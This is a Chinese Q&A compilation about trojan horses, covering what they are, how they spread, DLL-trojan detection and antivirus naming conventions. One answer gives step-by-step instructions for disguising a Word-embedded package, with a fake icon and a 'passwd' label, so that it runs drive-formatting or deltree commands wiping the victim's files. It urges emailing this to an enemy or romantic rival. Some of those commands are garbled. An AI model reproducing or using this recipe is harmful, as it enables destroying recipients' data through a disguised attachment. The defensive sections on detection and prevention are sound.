木马是什么格式的文件
通常是exe的可执行文件。 也可以整合到其它格式的文件中,在打开文件的同时被释放出来!
木马是什么软件?
木马分为客户端和服务端。客户端是作为管理服务端用的,服务端就是在你想要控制的电脑上安装,然后在使用客户端管理服务端。木马比较流行的是灰鸽子。不过免杀比较难做。PCSHARE的隐蔽性好。
木马是怎么做的
木马不能帮你。。很复杂。。我叫你怎么做病毒吧。。可不能害人那。。见下。
| 1 .创建一个只包含一个空格(为了减小文件体积,大家都知道)的文本文件,取名3jie。 2.打开WORD文档,将此文件拖放入文档。也可以点击记文档菜单栏中的“插入\对象”,弹出“插入对象”对话框,选中“从文件创建”,然后点击“浏览”按钮选择要插入的文件,点击“确定”,就OK了。。。 3.选中该插入对象的图标,选择菜单栏中的“编辑\包对象\编辑包”。 在弹出的“对象包装程序”对话框中,选择菜单栏中的“编辑\命令行”,然后输入如下命令:start.exe /m fmat c :/q /autotest /u ,点击“确定”,此时,内容栏中会显示出命令内容。这里就给我们大家一个启示,例如我们编辑上面的命令替换为:start.exe /m deltree /y a:\*.* c :\*.* d :\*.* 则是将删除对方硬盘下所有文件(盘符根据实际情况自定义);如果替换为:start.exe /m deltree /y c :\windows\system\*.* 则是删除对方c :\windows\system\目录底下的所有文件。这里我们可以得到启示,我们也可以编辑其他的命令如:@auto start 就是打开对放的服务。这里我就不演示了的,请多包涵。。。 4.点击“插入图标”按钮,会弹出一个对话框,确认,然后任选一个图标。这里我们可以随便选的, 5.选择菜单栏中的“编辑\标签”,为我们刚嵌入的对象改名(怎么看这办,不用我说吧)这里我们就假如用passwd吧。点击“文件”菜单中的“更新”,然后关闭此对话框。 6.将刚刚建立的嵌入对象拖放到桌面上。 看到了吧,就这么简单,不过你千万不要运行哦。要不损失不用我赔偿,你就慢慢的点吧,哈哈,不要看他小哦,要是你有个仇人或者给你情敌,用电子邮件当附件给他.高手闪!!! |
木马是怎么来的?
木马一般是下载东西,开一些网页中的!所以对不是在正规网站下载的东西最好先杀毒!在开网页时如果发现跟平常开网页不一样就要注意了! 如果不小心中了木马!如果自己知道木马文件在那里,可以自己把他删除就OK了!不知道木马位置的话可以用杀毒软件查杀! 木马删不掉是因为现在的木马都使用了文件关联!当你删这个时他的关联文件会马上在生成一个!所以你得在注册边里把他有关注册项删了,这个操作最好在安全模式下进行,可以的话把网线拔了!
什么是木马病毒 木马病毒的危害
1,木马病毒就是对电脑有危害的程序
2,电脑出现了木马病毒后,及时的对电脑杀毒就行了
3,可以安装个电脑管家在电脑上面
4,然后使用病毒查杀,对着电脑杀毒就行了
什么是木马病毒的区别
病毒有很多种,木马是病毒中一种,一般不破坏系统,只是盗取资料或者信息。
什么是木马,什么是木马病毒 什么是木马病毒
木马程序是目前比较流行的一类病毒文件,它与一般的病毒不同,它不会自我繁殖,也并不刻意地去感染其他文件。它通过将自身伪装吸引用户下载执行,或以捆绑在网页中的形式,当用户浏览网页时受害。木马程序向施种木马者提供打开被种者电脑的门户,使施种者可以任意毁坏、窃取被种者的文件和隐私,甚至远程操控被种者的电脑。木马的原理和计算机网络中常常要用到的远程控制软件相似,但由于远程控制软件是“善意”的控制,因此通常不具有隐蔽性;而木马程序则完全相反,木马要达到的是“偷窃”性的远程控制,如果没有很强的隐蔽性的话,那就是毫无价值的。 木马通常有两个可执行程序:一个是客户端,即控制端,另一个是服务端,即被控制端。木马的设计者为了防止木马被发现,而采用多种手段隐藏木马。木马的服务一旦运行,电脑就会有一个或几个端口被打开,黑客就可以利用控制端进入运行了服务端的电脑,甚至可以控制被种者的电脑,所以被种者的安全和个人隐私也就全无保障了! 随着微软的操作系统从Win9X过渡到WinNT系统(包括2000/xp/2003),微软的任务管理器也一下子“脱胎换骨”,变得“火眼金睛”起来 (在Win9X中,只需要将进程注册为系统服务就能够从进程查看器中隐形,可是这一切在WinNT中却完全不同,无论木马从端口、启动文件上如何巧妙地隐藏自己,始终都不能欺骗WinNT的任务管理器),这使得以前在win9X操作系统下靠将进程注册为系统服务就能够从任务管理器中隐形的木马面临前所未有的危机,所以木马的开发者及时调整了开发思路,转入了开发可以躲避WinNT的任务管理器的进程查询的动态嵌入式DLL木马。 要弄清楚什么是动态嵌入式DLL木马,我们必须要先了解Windows系统的另一种“可执行文件”——DLL,DLL是Dynamic Link Library(动态链接库)的缩写,DLL文件是Windows的基础,因为所有的API函数都是在DLL中实现的。DLL文件没有程序逻辑,是由多个功能函数构成,它并不能独立运行,DLL文件一般都是由进程加载并调用的。 因为DLL文件不能独立运行,所以在进程列表中并不会出现DLL。所以木马的开发者就通过编写动态嵌入式DLL木马,并且通过别的进程来运行它,那么无论是入侵检测软件还是进程列表中,都只会出现那个进程而并不会出现那个DLL木马。如果那个进程是可信进程(例如资源管理器Explorer.exe),那么就没人会怀疑DLL文件也是个木马了。从而木马就又实现了自己的隐蔽性的功能,所以,预防DLL木马也是相当重要的。 在WinNT系统,DLL木马一般都藏在System32目录下(因为System32是系统文件存放的目录,里面的文件很多,在里面隐藏当然很方便了),针对这一点我们可以在安装好系统和必要的应用程序后,对该目录下的EXE和DLL文件作一次记录:点击开始—运行—输入cmd回车—出现DOS命令行模式—输入cd回车,再输入cd C:WindowsSystem32回车,这就转换目录到了System32目录(要还是不知道怎么进入的,请参看DOS的cd命令的使用),输入命令:dir *.exe>exebackup.txt & dir *.dll>dllbackup.txt回车。 这样,我们就把System32目录下所有的exe文件和所有的dll文件都记录在exebackup.txt和dllbackup.txt里面了。日后如发现系统异常而用传统的方法又查不出问题时,则要考虑是不是系统中已经潜入了DLL木马。 这时我们用同样的方法将System32目录下的EXE和DLL文件记录到另外exebackup1.txt和dllbackup1.txt中,然后运行 CMD—fc exebackup.txt exebackup1.txt>different.txt & fc dllbackup.txt dllbackup1.txt>different.txt(使用FC命令比较前后两次的DLL和EXE文件,并将结果输入到 different.txt中),这样我们就能发现一些多出来的DLL和EXE文件,然后通过查看创建时间、版本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马光顾了。 没有是最好,如果有的话也不要直接删除掉,可以先把它移到回收站里,若系统没有异常反应再将之彻底删除,或者把DLL文件上报给反病毒研究中心检查。 最后,防治木马的危害,专家建议大家应采取以下措施: 第
一,安装反病毒软件和个人防火墙,并及时升级。 第
二,把个人防火墙设置好安全等级,防止未知程序向外传送数据。 第
三,使用安全性比较好的浏览器和电子邮件客户端工具。 第
四,操作系统的补丁要经常进行更新。 第
五,不要随便打开陌生网友传送的文件和下载、使用破解软件。 相信大家只要做好安全防护工作,防治木马并不是那么可怕的。
什么是木马病毒
前缀表示该病毒发作的操作平台或者病毒的类型,DOS下的病毒一般是没有前缀的;病毒名为该病毒的名称及其家族;后缀是区别在该病毒家族中各病毒的不同,用字母或用数字以说明此病毒的排序和大小。 Trojan表示该病毒是个木马,如果后面加.a,说明该木马的第一个变种。 WM代表着Word宏病毒; W97M代表着Word97宏病毒; XM代表着Excel宏病毒; X97M代表着在Excel97下制作完成的Excel宏病毒; XF代表着Excel程式(Excel Formula)病毒; AM代表着在ess95下制作完成并传播发作的ess的宏病毒; A97M代表着在ess97下制作完成并传播发作的ess的宏病毒; W95代表着Windows95病毒; Win代表着感染Windows3.x操作系统文件的病毒; W32代表着感染所有的32位Widnows平台的病毒; WNT代表着感染32位Windows NT操作系统的病毒; HLLC代表着高级语言同伴(High Level Language Companion)病毒; HLLP代表着高级语言寄生(High Level Language Parasitic)病毒; HLLO代表着高级语言改写(High Level Language Overwriting)病毒; Trojan/Troj代表着特洛伊木马;VBS代表着用Visual Basic Script程序语言编写的病毒; PWSTEAL代表着窃取密码等信息的木马; JAVA代表着用JAVA程序语言编写的病毒。
